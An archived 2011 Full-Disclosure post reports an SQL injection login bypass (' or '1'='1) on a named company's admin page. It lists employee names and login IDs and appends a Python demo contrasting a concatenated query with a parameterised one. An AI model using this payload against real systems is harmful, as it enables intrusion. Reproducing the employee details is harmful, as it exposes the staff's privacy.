Re: [Full-disclosure] vsworld.com - SQL Injection Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] vsworld.com - SQL Injection Vulnerability
- From: "Rakesh Nagekar" <nagekar.rakesh@xxxxxxxxx>
- Date: Thu, 20 Jan 2011 07:18:25 +0100 (CET)
Good to know that isolution members find the vulnerabilities in most of the
websites. Great India.
But sorry to say that their own websites related to
http://www.isolutionindia.com/ are more vulnerable.
Can you please check it once.
Regards,
Rakesh...
---------- Forwarded message ----------
From: Rakesh Nagekar <nagekar.rakesh@xxxxxxxxx>
Date: Wed, Jan 19, 2011 at 5:04 PM
Subject: vsworld.com - SQL Injection Vulnerability
To: full-disclosure@xxxxxxxxxxxxxxxxx
vsworld - SQL Injection Vulnerability
http://www.thehackerslibrary.com/?p=979
Profile:
Developing solutions for areas as diverse as technology, trading, power,
travel, education and retail. In addition, regularly called upon to cater to
the requirements of prestigious Government Bodies. Various prestigious clients
are in Client list.
Vendor URL: http://www.vsworld.com/index.php
Vulnerability Type: SQL Injection
Vulnerable URL:
http://www.vsworld.com/index.php/en/admin-login.html
&
http://www.vsworld.com/index.php => VSM Login
User Name: NIL
Password: ' or '1'='1
Now, login to the Control Panel.
Effect: You have access to the main admin panel, with options to view, delete
and update all client records, contact information, email ids etc.
All employees' personal information (contact no., address, mail ids etc.) and
their login credentials/passwords are visible.
Name: Venkatesh
ID: venky
Pwd: ----
Name: sangeeta
ID: sangeeta
Pwd: --------
Name: Ramkishan
ID: VSMlHN23
Pwd : -------
Name: Vikas
ID: vsm_vik1
Pwd: -------
Name: Vijay
ID: vsm_vij
Pwd: ------------
Name: X_Harish
ID: vsm_hari
Pwd: --------------
and more...
Passwords are not mentioned here for security reasons.
As the vulnerability is of the most common type, the vendor was notified and
has applied a fix.
Credit: Pradip Sharma, Sandeep Sengupta
Cyber Security Research Analysts, iSolution Software Systems Pvt. Ltd.
www.isolutionindia.com
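The advisory above reports two weaknesses: a login query built by string concatenation, so the password field `' or '1'='1` satisfies the WHERE clause for every row, and credentials stored in a form the admin panel can display in clear text. The following is an added example, written by the editor and not code from the advisory, the vendor or the reporters; it uses a constructed in-memory SQLite table with made-up accounts (not the accounts listed above). It shows the concatenated query that the quoted input turns into, beside a parameterised query that compares a salted PBKDF2 hash instead, so the same input is rejected and the table never holds a password to leak.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample accounts for the demo; not the accounts from the advisory.
SAMPLE_USERS = [("alice", "correct horse"), ("bob", "hunter2!")]


def _hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; the database keeps this, never the password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def build_db() -> sqlite3.Connection:
    """In-memory users table. pw_plain exists only to mirror the insecure
    design the advisory describes (clear-text passwords visible in the panel);
    the hardened login path reads only salt and pw_hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id TEXT PRIMARY KEY, pw_plain TEXT, "
        "salt BLOB, pw_hash BLOB)"
    )
    for user_id, password in SAMPLE_USERS:
        salt = os.urandom(16)
        conn.execute(
            "INSERT INTO users VALUES (?, ?, ?, ?)",
            (user_id, password, salt, _hash_password(password, salt)),
        )
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """String-concatenated query: user input becomes part of the SQL text."""
    return (
        "SELECT id FROM users WHERE id='" + username
        + "' AND pw_plain='" + password + "'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Returns the matched user id, or None. With the advisory's input the
    WHERE clause becomes (id='NIL' AND pw_plain='') OR '1'='1', which is
    true for every row, so the first account is returned without a password."""
    row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterised lookup plus constant-time hash comparison. The quote
    characters in the input are data bound to the placeholder, never SQL."""
    row = conn.execute(
        "SELECT id, salt, pw_hash FROM users WHERE id = ?", (username,)
    ).fetchone()
    if row is None:
        return None
    user_id, salt, stored_hash = row
    if hmac.compare_digest(_hash_password(password, salt), stored_hash):
        return user_id
    return None


if __name__ == "__main__":
    db = build_db()
    bypass = "' or '1'='1"
    print("query:", build_vulnerable_query("NIL", bypass))
    print("vulnerable login:", login_vulnerable(db, "NIL", bypass))
    print("parameterised login:", login_safe(db, "NIL", bypass))
    print("legitimate login:", login_safe(db, "alice", "correct horse"))
```

The fix is the placeholder, not input filtering: escaping quotes by hand leaves other parser-level tricks open, whereas a bound parameter can never change the statement's structure. Storing only a salted hash is the separate mitigation for the clear-text credentials the advisory saw in the panel.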
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/